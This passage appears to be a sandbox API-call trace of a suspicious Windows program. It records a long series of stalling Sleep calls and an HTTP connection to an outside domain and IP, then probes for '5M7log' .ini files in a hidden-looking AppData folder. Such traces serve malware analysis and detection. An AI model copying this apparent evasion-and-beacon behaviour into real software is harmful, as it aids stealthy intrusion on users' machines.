[0210.148] Sleep (dwMilliseconds=0x7d0) [0210.149] Sleep (dwMilliseconds=0x7d0) [0210.150] Sleep (dwMilliseconds=0x7d0) [0210.152] Sleep (dwMilliseconds=0x7d0) [0210.153] Sleep (dwMilliseconds=0x7d0) [0210.155] Sleep (dwMilliseconds=0x7d0) [0210.157] Sleep (dwMilliseconds=0x7d0) [0210.158] Sleep (dwMilliseconds=0x7d0) [0210.160] Sleep (dwMilliseconds=0x7d0) [0210.161] Sleep (dwMilliseconds=0x7d0) [0210.162] Sleep (dwMilliseconds=0x7d0) [0210.165] Sleep (dwMilliseconds=0x7d0) [0210.167] Sleep (dwMilliseconds=0x7d0) [0210.168] Sleep (dwMilliseconds=0x7d0) [0210.170] Sleep (dwMilliseconds=0x7d0) [0210.171] Sleep (dwMilliseconds=0x7d0) [0210.173] Sleep (dwMilliseconds=0x7d0) [0210.174] Sleep (dwMilliseconds=0x7d0) [0210.176] Sleep (dwMilliseconds=0x7d0) [0210.179] Sleep (dwMilliseconds=0x7d0) [0210.180] Sleep (dwMilliseconds=0x7d0) [0210.182] Sleep (dwMilliseconds=0x7d0) [0210.183] Sleep (dwMilliseconds=0x7d0) [0210.184] Sleep (dwMilliseconds=0x7d0) [0210.186] Sleep (dwMilliseconds=0x7d0) [0210.189] Sleep (dwMilliseconds=0x7d0) [0210.190] Sleep (dwMilliseconds=0x7d0) [0210.192] Sleep (dwMilliseconds=0x7d0) [0210.194] Sleep (dwMilliseconds=0x7d0) [0210.195] Sleep (dwMilliseconds=0x7d0) [0210.196] Sleep (dwMilliseconds=0x7d0) [0210.198] Sleep (dwMilliseconds=0x7d0) [0210.199] Sleep (dwMilliseconds=0x7d0) [0210.201] Sleep (dwMilliseconds=0x7d0) [0210.202] Sleep (dwMilliseconds=0x7d0) [0210.204] Sleep (dwMilliseconds=0x7d0) [0210.205] Sleep (dwMilliseconds=0x7d0) [0210.207] Sleep (dwMilliseconds=0x7d0) [0210.209] Sleep (dwMilliseconds=0x7d0) [0210.211] Sleep (dwMilliseconds=0x7d0) [0210.213] Sleep (dwMilliseconds=0x7d0) [0210.214] Sleep (dwMilliseconds=0x7d0) [0210.215] Sleep (dwMilliseconds=0x7d0) [0210.217] Sleep (dwMilliseconds=0x7d0) [0210.219] Sleep (dwMilliseconds=0x7d0) [0210.220] Sleep (dwMilliseconds=0x7d0) [0210.222] Sleep (dwMilliseconds=0x7d0) [0210.224] Sleep (dwMilliseconds=0x7d0) [0210.225] Sleep (dwMilliseconds=0x7d0) [0210.227] Sleep (dwMilliseconds=0x7d0) [0210.228] Sleep (dwMilliseconds=0x7d0) [0210.229] Sleep (dwMilliseconds=0x7d0) [0210.233] Sleep (dwMilliseconds=0x7d0) [0210.235] Sleep (dwMilliseconds=0x7d0) [0210.237] Sleep (dwMilliseconds=0x7d0) [0210.239] Sleep (dwMilliseconds=0x7d0) [0210.241] Sleep (dwMilliseconds=0x7d0) [0210.242] Sleep (dwMilliseconds=0x7d0) [0210.243] Sleep (dwMilliseconds=0x7d0) [0210.245] Sleep (dwMilliseconds=0x7d0) [0210.246] Sleep (dwMilliseconds=0x7d0) [0210.248] Sleep (dwMilliseconds=0x7d0) [0210.249] Sleep (dwMilliseconds=0x7d0) [0210.251] Sleep (dwMilliseconds=0x7d0) [0210.253] Sleep (dwMilliseconds=0x7d0) [0210.255] Sleep (dwMilliseconds=0x7d0) [0210.257] Sleep (dwMilliseconds=0x7d0) [0210.258] Sleep (dwMilliseconds=0x7d0) [0210.259] Sleep (dwMilliseconds=0x7d0) [0210.261] Sleep (dwMilliseconds=0x7d0) [0210.264] Sleep (dwMilliseconds=0x7d0) [0210.266] Sleep (dwMilliseconds=0x7d0) [0210.268] Sleep (dwMilliseconds=0x7d0) [0210.269] Sleep (dwMilliseconds=0x7d0) [0210.271] Sleep (dwMilliseconds=0x7d0) [0210.272] Sleep (dwMilliseconds=0x7d0) [0210.274] Sleep (dwMilliseconds=0x7d0) [0210.275] Sleep (dwMilliseconds=0x7d0) [0210.277] Sleep (dwMilliseconds=0x7d0) [0210.278] Sleep (dwMilliseconds=0x7d0) [0210.279] Sleep (dwMilliseconds=0x7d0) [0210.281] Sleep (dwMilliseconds=0x7d0) [0210.282] Sleep (dwMilliseconds=0x7d0) [0210.284] Sleep (dwMilliseconds=0x7d0) [0210.296] Sleep (dwMilliseconds=0x7d0) [0210.299] Sleep (dwMilliseconds=0x7d0) [0210.301] Sleep (dwMilliseconds=0x7d0) [0210.302] Sleep (dwMilliseconds=0x7d0) [0210.304] Sleep (dwMilliseconds=0x7d0) [0210.305] Sleep (dwMilliseconds=0x7d0) [0210.307] Sleep (dwMilliseconds=0x7d0) [0210.309] Sleep (dwMilliseconds=0x7d0) [0210.311] Sleep (dwMilliseconds=0x7d0) [0210.313] Sleep (dwMilliseconds=0x7d0) [0210.314] Sleep (dwMilliseconds=0x7d0) [0210.316] Sleep (dwMilliseconds=0x7d0) [0210.317] Sleep (dwMilliseconds=0x7d0) [0210.319] Sleep (dwMilliseconds=0x7d0) [0210.320] Sleep (dwMilliseconds=0x7d0) [0210.322] Sleep (dwMilliseconds=0x7d0) [0210.323] Sleep (dwMilliseconds=0x7d0) [0210.325] Sleep (dwMilliseconds=0x7d0) [0210.327] Sleep (dwMilliseconds=0x7d0) [0210.331] Sleep (dwMilliseconds=0x7d0) [0210.334] Sleep (dwMilliseconds=0x7d0) [0210.335] Sleep (dwMilliseconds=0x7d0) [0210.338] Sleep (dwMilliseconds=0x7d0) [0210.340] Sleep (dwMilliseconds=0x7d0) [0210.344] Sleep (dwMilliseconds=0x7d0) [0210.345] Sleep (dwMilliseconds=0x7d0) [0210.347] Sleep (dwMilliseconds=0x7d0) [0210.348] Sleep (dwMilliseconds=0x7d0) [0210.350] Sleep (dwMilliseconds=0x7d0) [0210.353] Sleep (dwMilliseconds=0x7d0) [0210.355] Sleep (dwMilliseconds=0x7d0) [0210.356] Sleep (dwMilliseconds=0x7d0) [0210.358] Sleep (dwMilliseconds=0x7d0) [0210.359] Sleep (dwMilliseconds=0x7d0) [0210.361] Sleep (dwMilliseconds=0x7d0) [0210.362] Sleep (dwMilliseconds=0x7d0) [0210.364] Sleep (dwMilliseconds=0x7d0) [0210.365] Sleep (dwMilliseconds=0x7d0) [0210.367] Sleep (dwMilliseconds=0x7d0) [0210.368] Sleep (dwMilliseconds=0x7d0) [0210.370] Sleep (dwMilliseconds=0x7d0) [0210.371] Sleep (dwMilliseconds=0x7d0) [0210.375] Sleep (dwMilliseconds=0x7d0) [0210.377] Sleep (dwMilliseconds=0x7d0) [0210.378] Sleep (dwMilliseconds=0x7d0) [0210.380] Sleep (dwMilliseconds=0x7d0) [0210.381] Sleep (dwMilliseconds=0x7d0) [0210.383] Sleep (dwMilliseconds=0x7d0) [0210.386] Sleep (dwMilliseconds=0x7d0) [0210.387] Sleep (dwMilliseconds=0x7d0) [0210.389] Sleep (dwMilliseconds=0x7d0) [0210.390] Sleep (dwMilliseconds=0x7d0) [0210.392] Sleep (dwMilliseconds=0x7d0) [0210.393] Sleep (dwMilliseconds=0x7d0) [0210.397] Sleep (dwMilliseconds=0x7d0) [0210.399] Sleep (dwMilliseconds=0x7d0) [0210.400] Sleep (dwMilliseconds=0x7d0) [0210.402] Sleep (dwMilliseconds=0x7d0) [0210.403] Sleep (dwMilliseconds=0x7d0) [0210.405] Sleep (dwMilliseconds=0x7d0) [0210.408] Sleep (dwMilliseconds=0x7d0) [0210.409] Sleep (dwMilliseconds=0x7d0) [0210.411] Sleep (dwMilliseconds=0x7d0) [0210.412] Sleep (dwMilliseconds=0x7d0) [0210.414] Sleep (dwMilliseconds=0x7d0) [0210.415] Sleep (dwMilliseconds=0x7d0) [0210.417] Sleep (dwMilliseconds=0x7d0) [0210.421] Sleep (dwMilliseconds=0x7d0) [0210.422] Sleep (dwMilliseconds=0x7d0) [0210.424] Sleep (dwMilliseconds=0x7d0) [0210.426] Sleep (dwMilliseconds=0x7d0) [0210.431] Sleep (dwMilliseconds=0x7d0) [0210.433] Sleep (dwMilliseconds=0x7d0) [0210.435] Sleep (dwMilliseconds=0x7d0) [0210.436] Sleep (dwMilliseconds=0x7d0) [0210.439] Sleep (dwMilliseconds=0x7d0) [0210.440] Sleep (dwMilliseconds=0x7d0) [0210.442] Sleep (dwMilliseconds=0x7d0) [0210.443] Sleep (dwMilliseconds=0x7d0) [0210.445] Sleep (dwMilliseconds=0x7d0) [0210.446] Sleep (dwMilliseconds=0x7d0) [0210.448] Sleep (dwMilliseconds=0x7d0) [0210.449] Sleep (dwMilliseconds=0x7d0) [0210.454] Sleep (dwMilliseconds=0x7d0) [0210.455] Sleep (dwMilliseconds=0x7d0) [0210.457] Sleep (dwMilliseconds=0x7d0) [0210.458] Sleep (dwMilliseconds=0x7d0) [0210.460] Sleep (dwMilliseconds=0x7d0) [0210.465] Sleep (dwMilliseconds=0x7d0) [0210.466] Sleep (dwMilliseconds=0x7d0) [0210.468] Sleep (dwMilliseconds=0x7d0) [0210.469] Sleep (dwMilliseconds=0x7d0) [0210.471] Sleep (dwMilliseconds=0x7d0) [0210.474] Sleep (dwMilliseconds=0x7d0) [0210.476] Sleep (dwMilliseconds=0x7d0) [0210.477] Sleep (dwMilliseconds=0x7d0) [0210.479] Sleep (dwMilliseconds=0x7d0) [0210.480] Sleep (dwMilliseconds=0x7d0) [0210.482] Sleep (dwMilliseconds=0x7d0) [0210.483] Sleep (dwMilliseconds=0x7d0) [0210.485] Sleep (dwMilliseconds=0x7d0) [0210.486] Sleep (dwMilliseconds=0x7d0) [0210.488] Sleep (dwMilliseconds=0x7d0) [0210.489] Sleep (dwMilliseconds=0x7d0) [0210.491] Sleep (dwMilliseconds=0x7d0) [0210.492] Sleep (dwMilliseconds=0x7d0) [0210.494] Sleep (dwMilliseconds=0x7d0) [0210.497] Sleep (dwMilliseconds=0x7d0) [0210.499] Sleep (dwMilliseconds=0x7d0) [0210.500] Sleep (dwMilliseconds=0x7d0) [0210.502] Sleep (dwMilliseconds=0x7d0) [0210.503] Sleep (dwMilliseconds=0x7d0) [0210.505] Sleep (dwMilliseconds=0x7d0) [0210.508] Sleep (dwMilliseconds=0x7d0) [0210.509] Sleep (dwMilliseconds=0x7d0) [0210.511] Sleep (dwMilliseconds=0x7d0) [0210.512] Sleep (dwMilliseconds=0x7d0) [0210.514] Sleep (dwMilliseconds=0x7d0) [0210.518] Sleep (dwMilliseconds=0x7d0) [0210.519] Sleep (dwMilliseconds=0x7d0) [0210.521] Sleep (dwMilliseconds=0x7d0) [0210.522] Sleep (dwMilliseconds=0x7d0) [0210.524] Sleep (dwMilliseconds=0x7d0) [0210.525] Sleep (dwMilliseconds=0x7d0) [0210.527] Sleep (dwMilliseconds=0x7d0) [0210.528] Sleep (dwMilliseconds=0x7d0) [0210.530] Sleep (dwMilliseconds=0x7d0) [0210.531] Sleep (dwMilliseconds=0x7d0) [0210.533] Sleep (dwMilliseconds=0x7d0) [0210.534] Sleep (dwMilliseconds=0x7d0) [0210.536] Sleep (dwMilliseconds=0x7d0) [0210.537] Sleep (dwMilliseconds=0x7d0) [0210.542] Sleep (dwMilliseconds=0x7d0) [0210.543] Sleep (dwMilliseconds=0x7d0) [0210.545] Sleep (dwMilliseconds=0x7d0) [0210.546] Sleep (dwMilliseconds=0x7d0) [0210.548] Sleep (dwMilliseconds=0x7d0) [0210.552] Sleep (dwMilliseconds=0x7d0) [0210.553] Sleep (dwMilliseconds=0x7d0) [0210.555] Sleep (dwMilliseconds=0x7d0) [0210.556] Sleep (dwMilliseconds=0x7d0) [0210.558] Sleep (dwMilliseconds=0x7d0) [0210.562] Sleep (dwMilliseconds=0x7d0) [0210.581] Sleep (dwMilliseconds=0x7d0) [0210.585] Sleep (dwMilliseconds=0x7d0) [0210.586] Sleep (dwMilliseconds=0x7d0) [0210.588] Sleep (dwMilliseconds=0x7d0) [0210.589] Sleep (dwMilliseconds=0x7d0) [0210.591] Sleep (dwMilliseconds=0x7d0) [0210.595] Sleep (dwMilliseconds=0x7d0) [0210.597] Sleep (dwMilliseconds=0x7d0) [0210.598] Sleep (dwMilliseconds=0x7d0) [0210.600] Sleep (dwMilliseconds=0x7d0) [0210.601] Sleep (dwMilliseconds=0x7d0) [0210.603] Sleep (dwMilliseconds=0x7d0) [0210.604] Sleep (dwMilliseconds=0x7d0) [0210.606] Sleep (dwMilliseconds=0x7d0) [0210.607] Sleep (dwMilliseconds=0x7d0) [0210.609] Sleep (dwMilliseconds=0x7d0) [0210.610] Sleep (dwMilliseconds=0x7d0) [0210.612] Sleep (dwMilliseconds=0x7d0) [0210.613] Sleep (dwMilliseconds=0x7d0) [0210.617] Sleep (dwMilliseconds=0x7d0) [0210.619] Sleep (dwMilliseconds=0x7d0) [0210.620] Sleep (dwMilliseconds=0x7d0) [0210.622] Sleep (dwMilliseconds=0x7d0) [0210.623] Sleep (dwMilliseconds=0x7d0) [0210.625] Sleep (dwMilliseconds=0x7d0) [0210.628] Sleep (dwMilliseconds=0x7d0) [0210.630] Sleep (dwMilliseconds=0x7d0) [0210.633] Sleep (dwMilliseconds=0x7d0) [0210.635] Sleep (dwMilliseconds=0x7d0) [0210.698] Sleep (dwMilliseconds=0x7d0) [0210.699] Sleep (dwMilliseconds=0x7d0) [0210.701] Sleep (dwMilliseconds=0x7d0) [0210.706] Sleep (dwMilliseconds=0x7d0) [0210.708] Sleep (dwMilliseconds=0x7d0) [0210.710] Sleep (dwMilliseconds=0x7d0) [0210.711] Sleep (dwMilliseconds=0x7d0) [0210.716] Sleep (dwMilliseconds=0x7d0) [0210.717] Sleep (dwMilliseconds=0x7d0) [0210.719] Sleep (dwMilliseconds=0x7d0) [0210.720] Sleep (dwMilliseconds=0x7d0) [0210.722] Sleep (dwMilliseconds=0x7d0) [0210.723] Sleep (dwMilliseconds=0x7d0) [0210.725] Sleep (dwMilliseconds=0x7d0) [0210.729] Sleep (dwMilliseconds=0x7d0) [0210.731] Sleep (dwMilliseconds=0x7d0) [0210.732] Sleep (dwMilliseconds=0x7d0) [0210.734] Sleep (dwMilliseconds=0x7d0) [0210.735] Sleep (dwMilliseconds=0x7d0) [0210.737] Sleep (dwMilliseconds=0x7d0) [0210.738] Sleep (dwMilliseconds=0x7d0) [0210.741] Sleep (dwMilliseconds=0x7d0) [0210.743] Sleep (dwMilliseconds=0x7d0) [0210.744] Sleep (dwMilliseconds=0x7d0) [0210.746] Sleep (dwMilliseconds=0x7d0) [0210.751] Sleep (dwMilliseconds=0x7d0) [0210.752] Sleep (dwMilliseconds=0x7d0) [0210.754] Sleep (dwMilliseconds=0x7d0) [0210.755] Sleep (dwMilliseconds=0x7d0) [0210.760] Sleep (dwMilliseconds=0x7d0) [0210.762] Sleep (dwMilliseconds=0x7d0) [0210.764] Sleep (dwMilliseconds=0x7d0) [0210.765] Sleep (dwMilliseconds=0x7d0) [0210.767] Sleep (dwMilliseconds=0x7d0) [0210.769] Sleep (dwMilliseconds=0x7d0) [0210.770] Sleep (dwMilliseconds=0x7d0) [0210.773] Sleep (dwMilliseconds=0x7d0) [0210.816] Sleep (dwMilliseconds=0x7d0) [0210.818] Sleep (dwMilliseconds=0x7d0) [0210.819] Sleep (dwMilliseconds=0x7d0) [0210.821] Sleep (dwMilliseconds=0x7d0) [0210.822] Sleep (dwMilliseconds=0x7d0) [0210.824] Sleep (dwMilliseconds=0x7d0) [0210.862] Sleep (dwMilliseconds=0x7d0) [0210.864] Sleep (dwMilliseconds=0x7d0) [0210.866] Sleep (dwMilliseconds=0x7d0) [0210.877] Sleep (dwMilliseconds=0x7d0) [0210.886] Sleep (dwMilliseconds=0x7d0) [0210.890] Sleep (dwMilliseconds=0x7d0) [0210.897] Sleep (dwMilliseconds=0x7d0) [0211.127] Sleep (dwMilliseconds=0x7d0) [0211.384] Sleep (dwMilliseconds=0x7d0) [0211.483] Sleep (dwMilliseconds=0x7d0) [0211.553] Sleep (dwMilliseconds=0x7d0) [0211.636] socket (af=2, type=1, protocol=6) returned 0x1de0 [0211.636] getaddrinfo (in: pNodeName="www.tenthgenerationtorah.com", pServiceName="80", pHints=0x9e75998*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e759c8 | out: ppResult=0x9e759c8*=0xa05e590*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92770*(sa_family=2, sin_port=0x50, sin_addr="103.224.212.220"), ai_next=0x0)) returned 0 [0211.848] connect (s=0x1de0, name=0x9f92770*(sa_family=2, sin_port=0x50, sin_addr="103.224.212.220"), namelen=16) returned 0 [0212.016] send (s=0x1de0, buf=0x82e10fa*, len=182, flags=0) returned 182 [0212.017] setsockopt (s=0x1de0, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0212.017] recv (in: s=0x1de0, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 416 [0212.221] closesocket (s=0x1de0) returned 0 [0212.222] Sleep (dwMilliseconds=0x7d0) [0212.223] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.223] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.224] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0212.224] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a2b0) returned 1 [0212.224] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.224] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.224] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0212.224] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a970) returned 1 [0212.224] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.224] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.224] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0212.224] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f890b0) returned 1 [0212.224] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.224] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.224] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0212.224] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89800) returned 1 [0212.224] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.224] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.224] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0212.224] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89c80) returned 1 [0212.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.225] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.225] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0212.225] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a850) returned 1 [0212.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.225] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.225] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0212.225] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a2b0) returned 1 [0212.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.225] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0212.225] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0212.225] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f890b0) returned 1 [0212.225] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0212.225] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, 